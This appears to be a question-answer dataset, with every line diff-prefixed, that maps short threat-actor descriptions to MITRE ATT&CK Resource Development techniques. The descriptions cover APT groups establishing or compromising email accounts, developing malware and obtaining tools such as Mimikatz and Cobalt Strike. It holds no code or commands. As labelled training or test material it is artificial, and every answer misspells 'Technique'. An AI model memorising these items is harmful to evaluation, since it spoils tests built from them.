+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Indrik Spider has created email accounts to communicate with their ransomware victims, to include providing payment and decryption details.","Tecnique: T1585.002 Establish Accounts: Email Accounts, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has created email accounts for phishing operations.,"Tecnique: T1585.002 Establish Accounts: Email Accounts, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group has created new email accounts for spearphishing operations.,"Tecnique: T1585.002 Establish Accounts: Email Accounts, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Leviathan has created new email accounts for targeting efforts.,"Tecnique: T1585.002 Establish Accounts: Email Accounts, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound has established email accounts using fake personas for spearphishing operations.,"Tecnique: T1585.002 Establish Accounts: Email Accounts, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mustang Panda has leveraged the legitimate email marketing service SMTP2Go for phishing campaigns.,"Tecnique: T1585.002 Establish Accounts: Email Accounts, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team has created email accounts that mimic legitimate organizations for its spearphishing operations.,"Tecnique: T1585.002 Establish Accounts: Email Accounts, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Silent Librarian has established e-mail accounts to receive e-mails forwarded from compromised accounts.,"Tecnique: T1585.002 Establish Accounts: Email Accounts, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wizard Spider has leveraged ProtonMail email addresses in ransom notes when delivering Ryuk ransomware.,"Tecnique: T1585.002 Establish Accounts: Email Accounts, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Leviathan has compromised social media accounts to conduct social engineering attacks.,"Tecnique: T1586.001 Compromise Accounts: Social Media Accounts, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team creates credential capture webpages to compromise existing, legitimate social media accounts.","Tecnique: T1586.001 Compromise Accounts: Social Media Accounts, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 has used compromised email accounts to send credential phishing emails.,"Tecnique: T1586.002 Compromise Accounts: Email Accounts, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT29 has compromised email accounts to further enable phishing campaigns and taken control of dormant accounts.,"Tecnique: T1586.002 Compromise Accounts: Email Accounts, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HEXANE has used compromised accounts to send spearphishing emails.,"Tecnique: T1586.002 Compromise Accounts: Email Accounts, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: IndigoZebra has compromised legitimate email accounts to use in their spearphishing operations.,"Tecnique: T1586.002 Compromise Accounts: Email Accounts, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has compromised email accounts to send spearphishing e-mails.,"Tecnique: T1586.002 Compromise Accounts: Email Accounts, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LAPSUS$ has payed employees, suppliers, and business partners of target organizations for credentials.","Tecnique: T1586.002 Compromise Accounts: Email Accounts, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Leviathan has compromised email accounts to conduct social engineering attacks.,"Tecnique: T1586.002 Compromise Accounts: Email Accounts, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound has compromised personal email accounts through the use of legitimate credentials and gathered additional victim information.,"Tecnique: T1586.002 Compromise Accounts: Email Accounts, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT29 has used residential proxies, including Azure Virtual Machines, to obfuscate their access to victim environments.","Tecnique: T1586.003 Compromise Accounts: Cloud Accounts, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky created and used a mailing toolkit to use in spearphishing attacks.,"Tecnique: T1587 Develop Capabilities, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For C0010, UNC3890 actors used unique malware, including SUGARUSH and SUGARDUMP.","Tecnique: T1587.001 Develop Capabilities: Malware, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For CostaRicto, the threat actors used custom malware, including PS1, CostaBricks, and SombRAT.","Tecnique: T1587.001 Develop Capabilities: Malware, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For Operation Dream Job, Lazarus Group developed custom tools such as Sumarta, DBLL Dropper, Torisma, and DRATzarus for their operations.","Tecnique: T1587.001 Develop Capabilities: Malware, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For Operation Ghost, APT29 used new strains of malware including FatDuke, MiniDuke, RegDuke, and PolyglotDuke.","Tecnique: T1587.001 Develop Capabilities: Malware, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For Operation Sharpshooter, the threat actors used the Rising Sun modular backdoor.","Tecnique: T1587.001 Develop Capabilities: Malware, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Wocao, threat actors developed their own custom webshells to upload to compromised servers.","Tecnique: T1587.001 Develop Capabilities: Malware, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For the SolarWinds Compromise, APT29 used numerous pieces of malware that were likely developed for or by the group, including SUNBURST, SUNSPOT, Raindrop, and TEARDROP.","Tecnique: T1587.001 Develop Capabilities: Malware, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: In the Triton Safety Instrumented System Attack, TEMP.Veles developed, prior to the attack, malware capabilities that would require access to specific and specialized hardware and software.","Tecnique: T1587.001 Develop Capabilities: Malware, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT29 has used unique malware in many of their operations.,"Tecnique: T1587.001 Develop Capabilities: Malware, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Aoqin Dragon has used custom malware, including Mongall and Heyoka Backdoor, in their operations.","Tecnique: T1587.001 Develop Capabilities: Malware, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cleaver has created customized tools and payloads for functions including ARP poisoning, encryption, credential dumping, ASP.NET shells, web backdoors, process enumeration, WMI querying, HTTP and SMB communications, network interface sniffing, and keystroke logging.","Tecnique: T1587.001 Develop Capabilities: Malware, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN13 has utilized custom malware to maintain persistence in a compromised environment.,"Tecnique: T1587.001 Develop Capabilities: Malware, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN7 has developed malware for use in operations, including the creation of infected removable media.","Tecnique: T1587.001 Develop Capabilities: Malware, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Indrik Spider has developed malware for their operations, including ransomware such as BitPaymer and WastedLocker.","Tecnique: T1587.001 Develop Capabilities: Malware, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ke3chang has developed custom malware that allowed them to maintain persistence on victim networks.,"Tecnique: T1587.001 Develop Capabilities: Malware, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has developed its own unique malware such as MailFetch.py for use in operations.,"Tecnique: T1587.001 Develop Capabilities: Malware, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group has developed custom malware for use in their operations.,"Tecnique: T1587.001 Develop Capabilities: Malware, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LuminousMoth has used unique malware for information theft and exfiltration.,"Tecnique: T1587.001 Develop Capabilities: Malware, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Moses Staff has built malware, such as DCSrv and PyDCrypt, for targeting victims' machines.","Tecnique: T1587.001 Develop Capabilities: Malware, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team has developed malware for its operations, including malicious mobile applications and destructive malware such as NotPetya and Olympic Destroyer.","Tecnique: T1587.001 Develop Capabilities: Malware, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TeamTNT has developed custom malware such as Hildegard.,"Tecnique: T1587.001 Develop Capabilities: Malware, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turla has developed its own unique malware for use in operations.,"Tecnique: T1587.001 Develop Capabilities: Malware, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Dream Job, Lazarus Group digitally signed their malware and the dbxcli utility.","Tecnique: T1587.002 Develop Capabilities: Code Signing Certificates, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PROMETHIUM has created self-signed certificates to sign malicious installers.,"Tecnique: T1587.002 Develop Capabilities: Code Signing Certificates, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Patchwork has created self-signed certificates from fictitious and spoofed legitimate software companies that were later used to sign malware.,"Tecnique: T1587.002 Develop Capabilities: Code Signing Certificates, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For C0011, Transparent Tribe established SSL certificates on the typo-squatted domains the group registered.","Tecnique: T1587.003 Develop Capabilities: Digital Certificates, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT29 has created self-signed digital certificates to enable mutual TLS authentication for malware.,"Tecnique: T1587.003 Develop Capabilities: Digital Certificates, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PROMETHIUM has created self-signed digital certificates for use in HTTPS C2 traffic.,"Tecnique: T1587.003 Develop Capabilities: Digital Certificates, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For C0015, the threat actors used Cobalt Strike and Conti ransomware.","Tecnique: T1588.001 Obtain Capabilities: Malware, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For FunnyDream, the threat actors used a new backdoor named FunnyDream.","Tecnique: T1588.001 Obtain Capabilities: Malware, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Night Dragon, threat actors used Trojans from underground hacker websites.","Tecnique: T1588.001 Obtain Capabilities: Malware, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For Operation Spalax, the threat actors obtained malware, including Remcos, njRAT, and AsyncRAT.","Tecnique: T1588.001 Obtain Capabilities: Malware, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT1 used publicly available malware for privilege escalation.,"Tecnique: T1588.001 Obtain Capabilities: Malware, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Andariel has used a variety of publicly-available remote access Trojans (RATs) for its operations.,"Tecnique: T1588.001 Obtain Capabilities: Malware, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Aquatic Panda has acquired and used njRAT in its operations.,"Tecnique: T1588.001 Obtain Capabilities: Malware, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BackdoorDiplomacy has obtained and used leaked malware, including DoublePulsar, EternalBlue, EternalRocks, and EternalSynergy, in its operations.","Tecnique: T1588.001 Obtain Capabilities: Malware, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Earth Lusca has acquired and used a variety of malware, including Cobalt Strike.","Tecnique: T1588.001 Obtain Capabilities: Malware, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LAPSUS$ acquired and used the Redline password stealer in their operations.,"Tecnique: T1588.001 Obtain Capabilities: Malware, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LazyScripter has used a variety of open-source remote access Trojans for its operations.,"Tecnique: T1588.001 Obtain Capabilities: Malware, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LuminousMoth has obtained and used malware such as Cobalt Strike.,"Tecnique: T1588.001 Obtain Capabilities: Malware, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Metador has used unique malware in their operations, including metaMain and Mafalda.","Tecnique: T1588.001 Obtain Capabilities: Malware, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA2541 has used multiple strains of malware available for purchase on criminal forums or in open-source repositories.,"Tecnique: T1588.001 Obtain Capabilities: Malware, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA505 has used malware such as Azorult and Cobalt Strike in their operations.,"Tecnique: T1588.001 Obtain Capabilities: Malware, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turla has used malware obtained after compromising other threat actors, such as OilRig.","Tecnique: T1588.001 Obtain Capabilities: Malware, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For C0010, UNC3890 actors obtained multiple publicly-available tools, including METASPLOIT, UNICORN, and NorthStar C2.","Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For C0015, the threat actors obtained a variety of tools, including AdFind, AnyDesk, and Process Hacker.","Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For C0017, APT41 obtained publicly available tools such as YSoSerial.NET, ConfuserEx, and BadPotato.","Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For C0018, the threat actors acquired a variety of open source tools, including Mimikatz, Sliver, SoftPerfect Network Scanner, AnyDesk, and PDQ Deploy.","Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For C0021, the threat actors used Cobalt Strike configured with a modified variation of the publicly available Pandora Malleable C2 Profile.","Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0027, Scattered Spider obtained and used multiple tools including the LINpeas privilege escalation utility, aws_consoler, rsocx reverse proxy, Level RMM tool, and RustScan port scanner.","Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the C0032 campaign, TEMP.Veles obtained and used tools such as Mimikatz and PsExec.","Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During CostaRicto, the threat actors obtained open source tools to use in their operations.","Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Cutting Edge, threat actors leveraged tools including Interactsh to identify vulnerable targets, PySoxy to simultaneously dispatch traffic between multiple endpoints, BusyBox to enable post exploitation activities, and Kubo Injector to inject shared objects into process memory.","Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For Frankenstein, the threat actors obtained and used Empire.","Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For FunnyDream, the threat actors used a modified version of the open source PcShare remote administration tool.","Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Night Dragon, threat actors obtained and used tools such as gsecdump.","Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For Operation CuckooBees, the threat actors obtained publicly-available JSP code that was used to deploy a webshell onto a compromised server.","Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For Operation Dream Job, Lazarus Group obtained tools such as Wake-On-Lan, Responder, ChromePass, and dbxcli.","Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For Operation Spalax, the threat actors obtained packers such as CyaX.","Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For Operation Wocao, the threat actors obtained a variety of open source tools, including JexBoss, KeeThief, and BloodHound.","Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: In the Triton Safety Instrumented System Attack, TEMP.Veles used tools such as Mimikatz and other open-source software.","Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT-C-36 obtained and used a modified variant of Imminent Monitor.,"Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT1 has used various open-source tools for privilege escalation purposes.,"Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT19 has obtained and used publicly-available tools like Empire.,"Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 has obtained and used open-source tools like Koadic, Mimikatz, and Responder.","Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT29 has obtained and used a variety of tools including Mimikatz, SDelete, Tor, meek, and Cobalt Strike.","Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32 has obtained and used tools such as Mimikatz and Cobalt Strike, and a variety of other open-source tools from GitHub.","Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT33 has obtained and leveraged publicly-available tools for early intrusion activities.,"Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT38 has obtained and used open-source tools such as Mimikatz.,"Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT39 has modified and used customized versions of publicly-available tools like PLINK and Mimikatz.,"Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 has obtained and used tools such as Mimikatz, pwdump, PowerSploit, and Windows Credential Editor.","Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Aoqin Dragon obtained the Heyoka open source exfiltration tool and subsequently modified it for their operations.,"Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Aquatic Panda has acquired and used Cobalt Strike in its operations.,"Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BITTER has obtained tools such as PuTTY for use in their operations.,"Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BRONZE BUTLER has obtained and used open-source tools such as Mimikatz, gsecdump, and Windows Credential Editor.","Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BackdoorDiplomacy has obtained a variety of open-source reconnaissance and red team tools for discovery and lateral movement.,"Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BlackTech has obtained and used tools such as Putty, SNScan, and PsExec for its operations.","Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Blue Mockingbird has obtained and used tools such as Mimikatz.,"Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Carbanak has obtained and used open-source tools such as PsExec and Mimikatz.,"Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chimera has obtained and used tools such as BloodHound, Cobalt Strike, Mimikatz, and PsExec.","Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cinnamon Tempest has used open-source tools including customized versions of the Iox proxy tool, NPS tunneling tool, Meterpreter, and a keylogger that uploads data to Alibaba cloud storage.","Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cleaver has obtained and used open-source tools such as PsExec, Windows Credential Editor, and Mimikatz.","Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Group has obtained and used a variety of tools including Mimikatz, PsExec, Cobalt Strike, and SDelete.","Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CopyKittens has used Metasploit, Empire, and AirVPN for post-exploitation activities.","Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkHydrus has obtained and used tools such as Mimikatz, Empire, and Cobalt Strike.","Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkVishnya has obtained and used tools such as Impacket, Winexe, and PsExec.","Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dragonfly has obtained and used tools such as Mimikatz, CrackMapExec, and PsExec.","Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Earth Lusca has acquired and used a variety of open source tools.,"Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ember Bear has obtained and used open source scripts from GitHub.,"Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN10 has relied on publicly-available software to gain footholds and establish persistence in victim environments.,"Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN13 has utilized publicly available tools such as Mimikatz, Impacket, PWdump7, ProcDump, Nmap, and Incognito V2 for targeting efforts.","Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN5 has obtained and used a customized version of PsExec, as well as use other tools such as pwdump, SDelete, and Windows Credential Editor.","Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN6 has obtained and used tools such as Mimikatz, Cobalt Strike, and AdFind.","Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN7 has utilized a variety of tools such as Cobalt Strike, PowerSploit, and the remote management tool, Atera for targeting efforts.","Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN8 has used open-source tools such as Impacket for targeting efforts.,"Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ferocious Kitten has obtained open source tools for its operations, including JsonCPP and Psiphon.","Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GALLIUM has used a variety of widely-available tools, which in some cases they modified to add functionality and/or subvert antimalware solutions.","Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gorgon Group has obtained and used tools such as QuasarRAT and Remcos.,"Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HEXANE has acquired, and sometimes customized, open source tools such as Mimikatz, Empire, VNC remote access software, and DIG.net.","Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Inception has obtained and used open-source tools such as LaZagne.,"Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: IndigoZebra has acquired open source tools such as NBTscan and Meterpreter for their operations.,"Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ke3chang has obtained and used tools such as Mimikatz.,"Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has obtained and used tools such as Nirsoft WebBrowserPassVIew, Mimikatz, and PsExec.","Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LAPSUS$ has obtained tools such as RVTools and AD Explorer for their operations.,"Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group has obtained a variety of tools for their operations, including Responder and PuTTy PSCP.","Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Leafminer has obtained and used tools such as LaZagne, Mimikatz, PsExec, and MailSniper.","Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LuminousMoth has obtained an ARP spoofing tool from GitHub.,"Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound has obtained and used tools like Havij, sqlmap, Metasploit, Mimikatz, and Plink.","Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Metador has used Microsoft's Console Debugger in some of their operations.,"Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Moses Staff has used the commercial tool DiskCryptor.,"Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MuddyWater has made use of legitimate tools ConnectWise and Remote Utilities to gain access to target environment.,"Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
